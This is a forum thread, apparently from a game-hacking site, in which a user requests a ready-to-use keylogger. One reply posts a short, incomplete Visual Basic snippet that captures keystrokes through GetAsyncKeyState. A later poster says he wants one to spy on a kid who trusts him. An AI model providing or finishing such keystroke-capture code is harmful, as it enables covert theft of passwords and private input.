Skip to content
MPGHThe Dark Arts
/
RegisterLog in
Forum
Community
What's NewLatest posts across the boardTrendingHottest threads right nowSubscribedThreads you follow
Discussion
GeneralIntroductionsEntertainmentDebate FortFlaming & Rage
Board
News & AnnouncementsMPGH TimesSuggestions & HelpGiveaways
More Sections
Art & Graphic DesignProgrammingHackingCryptocurrency
Hacks & Cheats
Games
ValorantCS2 / CS:GOCall of Duty / WarzoneFortniteApex LegendsEscape From Tarkov
+14 moreLeague of LegendsGTA VMinecraftRustROTMGBattlefieldTroveBattleOnCombat ArmsCrossFireBlackshotRuneScapeDayZDead by Daylight
Resources
Game Hacking TutorialsReverse EngineeringGeneral Game HackingAnti-CheatConsole Game Hacking
Tools
Game Hacking ToolsTrainers & CheatsHack/Release NewsNew
Submit a release →Share your cheat, tool, or config with the community.
AINEW
AI Tools
General & DiscussionPrompt EngineeringLLM JailbreaksHotAI Agents & AutomationLocal / Open Models
AI × Gaming
AI Aimbots & VisionML Anti-CheatGame Bots & Automation
Create
AI Coding / Vibe CodingAI Art & MediaAI Voice & TTS
The AI frontier →Where game hacking meets modern machine learning. Jump in.
Marketplace
Buy & Sell
SellingBuyingTradingUser Services
Trust & Safety
Middleman LoungeMarketplace TalkVouch Copy Profiles
Money
Cryptocurrency TalkCurrency ExchangeWork & Job Offers
Start selling →List accounts, services, and goods. Use the middleman to trade safe.
MPGH The Dark Arts

A community for offensive security research, reverse engineering, and AI.

Community

ForumMarketplaceSearch

Account

RegisterLog in

Legal

Privacy PolicyForum RulesHelp & FAQ
© 2026 MPGH · All rights reserved.Built by the community, for the community. For educational purposes onlyContent is shared for security research and education — we don't condone illegal use. You're responsible for complying with applicable laws. Use at your own risk.
Home › Forum › Programming › Visual Basic Programming › [Request] Keylogger + Tutorial

[Request] Keylogger + Tutorial

Posts 1–15 of 15 · Page 1 of 1
TA
TaRwA
[Request] Keylogger + Tutorial
Hello.
I need a Keylogger with little tutorial how to use that.
If someone help me i give you "Rep" and Promo Code for "Warrock 7 Days Premium" !

Thanks and Greetings ;*
#1 · 16y ago
PI
Pixipixel_
Use the search button.

btw do not make double thread.
http://www.mpgh.net/forum/33-visual-...keylogger.html
#2 · 16y ago
TA
TaRwA
I tryied to find something on forum but i can't find any working Keylogger
#3 · 16y ago
WT
wtfiwantthatname
First off why do you want a keylogger? And if im satisfied its not for anything illegal. I will supply you with what you need?
#4 · 16y ago
2V
2vivi
this is how to make a basic keylogger

add a text box and a timer (Enabled) to your form.. and put this in ur code

Code:
Public Class Form1
Dim result As Integer
Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer

Timer1_Tick
For i = 1 To 255
result = 0
result = GetAsyncKeyState(i)
If result = -32767 Then
TextBox1.Text = TextBox1.Text + Chr(i)
End If
Next i
#5 · edited 16y ago · 16y ago
Zoom
Zoom
Quote Originally Posted by 2vivi View Post
this is how to make a basic keylogger

add a text box and a timer (Enabled) to your form.. and put this in ur code

Code:
Public Class Form1
Dim result As Integer
Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer

Timer1_Tick
For i = 1 To 255
result = 0
result = GetAsyncKeyState(i)
If result = -32767 Then
TextBox1.Text = TextBox1.Text + Chr(i)
End If
Next i
That´s the simplest way !
#6 · 16y ago
TA
TaRwA
I'm totally choob on programming so... I need a ready for use Keylogger...
Or ready code to paste in Compiler ; D

Greetings ;*
#7 · 16y ago
TA
TaRwA
I'm totally choob on programming so... I need a ready for use Keylogger...
Or ready code to paste in Compiler ; D

Greetings ;*
#8 · 16y ago
XG
XGelite
no double posting..
#9 · 16y ago
Zoom
Zoom
Quote Originally Posted by TaRwA View Post
I'm totally choob on programming so... I need a ready for use Keylogger...
Or ready code to paste in Compiler ; D

Greetings ;*
Youtube is your freind!
#10 · 16y ago
WT
wtfiwantthatname
Ok tarwa i have one that you can use. I just need to be sure your not using it for something of questionable legality.
#11 · 16y ago
TA
TaRwA
It's not problem. I starting programming in C++ and i want to try start programming Keyloggers.
When i have keylogger can i look at his codes and other stuff.
Thank You for your answer ;*

Greetings ;*
#12 · 16y ago
PI
Pixipixel_
Quote Originally Posted by TaRwA View Post
It's not problem. I starting programming in C++ and i want to try start programming Keyloggers.
When i have keylogger can i look at his codes and other stuff.
It's Visual Basic here.
#13 · 16y ago
TA
TaRwA
Yeah , but i learn Visual Basics and C++ and i want to try what language is easier for beginners...
So i need Keylogger maked in VB and in C++ for tests .
I want to keylogg my PC to test hich Keylogg is better and other...

[Sorry for my Poor English cuz i'm from Poland]

;*
#14 · 16y ago
(G)rapefruit
(G)rapefruit
I want to know how to make one too... I want to own some annoying showoff kid that trusts me. *evil*
#15 · 16y ago
Posts 1–15 of 15 · Page 1 of 1

Post a Reply

Similar Threads

  • [Request] Keylogger + Tutorial NeededBy TaRwA in Programming Tutorial Requests
    8Last post 16y ago
  • Requesting: Hacking TutorialBy AthlaS in Hack Requests
    1Last post 20y ago
  • [REQUEST]trainer tutorialBy kanym in WarRock - International Hacks
    3Last post 19y ago
  • [request] keyloggerBy prox32 in Suggestions, Requests & General Help
    6Last post 19y ago
  • (Request) A tutorial on how to extract addresses from trainersBy englishpom in WarRock - International Hacks
    9Last post 19y ago

Tags for this Thread

None